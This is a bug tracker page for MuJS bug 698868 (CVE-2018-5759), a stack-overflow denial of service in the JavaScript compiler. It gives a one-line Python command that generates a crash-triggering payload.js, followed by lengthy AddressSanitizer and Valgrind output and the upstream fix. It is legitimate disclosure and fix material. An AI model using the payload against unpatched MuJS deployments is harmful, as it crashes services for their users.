698868 – DoS caused by the interactive call between two functions

Bug 698868 - DoS caused by the interactive call between two functions

Summary: DoS caused by the interactive call between two functions

Status:	RESOLVED FIXED

Alias:	None

Product:	MuJS
Classification:	Unclassified
Component:	general (show other bugs)
Version:	unspecified
Hardware:	PC Linux

Importance:	P1 blocker
Assignee:	Tor Andersson

URL:
Keywords:

Depends on:
Blocks:

Reported:	2018-01-16 15:31 UTC by invictus1306
Modified:	2019-05-08 13:53 UTC (History)
CC List:	1 user (show)

See Also:
Customer:
Word Size:	---

Attachments
poc file (468.75 KB, application/javascript) 2018-01-17 00:49 UTC, invictus1306	Details
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description invictus1306 2018-01-16 15:31:28 UTC

The continuous call between the two functions "jsC_cexp" function and "cbinary" allows attackers to cause a denial of service (application crash) via a crafted js file.

This is the POC file:
# python -c "print 'func%d'*80000" > payload.js

AddressSanitizer report
# ./build/sanitize/mujs payload.js 
ASAN:SIGSEGV
=================================================================
==4677==ERROR: AddressSanitizer: stack-overflow on address 0x7ffec2a9fff8 (pc 0x00000040a58e bp 0x7ffec2aa0030 sp 0x7ffec2a9fff0 T0)
    #0 0x40a58d in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:553
    #1 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #2 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #3 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #4 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #5 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #6 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #7 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #8 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #9 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #10 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #11 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #12 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #13 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #14 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #15 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #16 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #17 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #18 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #19 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #20 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #21 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #22 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #23 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #24 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #25 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #26 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #27 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #28 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #29 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #30 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #31 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #32 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #33 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #34 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #35 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #36 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #37 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #38 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #39 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #40 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #41 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #42 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #43 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #44 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #45 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #46 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #47 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #48 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #49 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #50 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #51 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #52 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #53 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #54 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #55 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #56 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #57 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #58 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #59 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #60 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #61 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #62 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #63 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #64 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #65 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #66 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #67 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #68 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #69 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #70 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #71 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #72 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #73 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #74 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #75 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #76 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #77 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #78 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #79 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #80 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #81 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #82 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #83 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #84 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #85 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #86 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #87 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #88 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #89 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #90 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #91 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #92 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #93 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #94 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #95 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #96 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #97 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #98 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #99 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #100 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #101 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #102 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #103 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #104 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #105 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #106 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #107 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #108 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #109 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #110 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #111 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #112 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #113 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #114 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #115 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #116 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #117 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #118 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #119 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #120 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #121 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #122 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #123 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #124 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #125 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #126 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #127 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #128 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #129 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #130 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #131 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #132 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #133 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #134 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #135 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #136 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #137 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #138 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #139 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #140 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #141 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #142 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #143 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #144 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #145 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #146 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #147 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #148 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #149 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #150 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #151 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #152 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #153 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #154 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #155 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #156 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #157 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #158 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #159 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #160 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #161 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #162 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #163 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #164 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #165 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #166 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #167 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #168 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #169 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #170 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #171 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #172 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #173 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #174 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #175 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #176 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #177 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #178 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #179 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #180 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #181 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #182 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #183 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #184 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #185 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #186 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #187 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #188 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #189 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #190 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #191 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #192 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #193 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #194 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #195 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #196 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #197 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #198 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #199 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #200 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #201 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #202 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #203 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #204 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #205 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #206 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #207 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #208 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #209 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #210 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #211 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #212 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #213 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #214 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #215 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #216 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #217 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #218 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #219 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #220 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #221 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #222 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #223 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #224 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #225 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #226 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #227 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #228 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #229 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #230 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #231 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #232 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #233 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #234 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #235 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #236 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #237 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #238 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #239 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #240 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #241 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #242 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #243 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #244 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #245 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #246 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #247 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #248 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #249 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #250 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #251 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280

Valgrind report
# valgrind ./build/release/mujs payload.js 
==4681== Memcheck, a memory error detector
==4681== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==4681== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==4681== Command: ./build/release/mujs payload.js
==4681== 
==4681== Stack overflow in thread #1: can't grow stack to 0xffe801000
==4681== 
==4681== Process terminating with default action of signal 11 (SIGSEGV)
==4681==  Access not within mapped region at address 0xFFE801FC8
==4681== Stack overflow in thread #1: can't grow stack to 0xffe801000
==4681==    at 0x40F8C0: ??? (in /home/invictus1306/Documents/vulns/mujs/build/release/mujs)
==4681==  If you believe this happened as a result of a stack
==4681==  overflow in your program's main thread (unlikely but
==4681==  possible), you can try to increase the size of the
==4681==  main thread stack using the --main-stacksize= flag.
==4681==  The main thread stack size used in this run was 8388608.
==4681== Stack overflow in thread #1: can't grow stack to 0xffe801000
==4681== 
==4681== Process terminating with default action of signal 11 (SIGSEGV)
==4681==  Access not within mapped region at address 0xFFE801FC0
==4681== Stack overflow in thread #1: can't grow stack to 0xffe801000
==4681==    at 0x4A28680: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-amd64-linux.so)
==4681==  If you believe this happened as a result of a stack
==4681==  overflow in your program's main thread (unlikely but
==4681==  possible), you can try to increase the size of the
==4681==  main thread stack using the --main-stacksize= flag.
==4681==  The main thread stack size used in this run was 8388608.
==4681== 
==4681== HEAP SUMMARY:
==4681==     in use at exit: 14,678,942 bytes in 161,289 blocks
==4681==   total heap usage: 161,391 allocs, 102 frees, 14,687,958 bytes allocated
==4681== 
==4681== LEAK SUMMARY:
==4681==    definitely lost: 0 bytes in 0 blocks
==4681==    indirectly lost: 0 bytes in 0 blocks
==4681==      possibly lost: 0 bytes in 0 blocks
==4681==    still reachable: 14,678,942 bytes in 161,289 blocks
==4681==         suppressed: 0 bytes in 0 blocks
==4681== Rerun with --leak-check=full to see details of leaked memory
==4681== 
==4681== For counts of detected and suppressed errors, rerun with: -v
==4681== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)
Segmentation fault (core dumped)

Comment 1 Ken Sharp 2018-01-17 00:16:52 UTC

Please attach your 'payload'js' file, we can't work on the problem without a specimen file, and there's no guarantee that one we create will match yours.

Comment 2 invictus1306 2018-01-17 00:49:06 UTC

Created attachment 14594 [details]
poc file

Comment 3 invictus1306 2018-01-17 15:45:08 UTC

Hello if you need more info, please ask :)

Comment 4 Tor Andersson 2018-01-24 07:33:06 UTC

Fixed in commit 4d45a96e57fbabf00a7378b337d0ddcace6f38c1
Author: Tor Andersson <tor.andersson@artifex.com>
Date:   Thu Jan 18 14:16:28 2018 +0100

    Guard binary expressions from too much recursion.

Comment 5 invictus1306 2018-01-25 02:49:59 UTC

This issue has been assigned CVE-2018-5759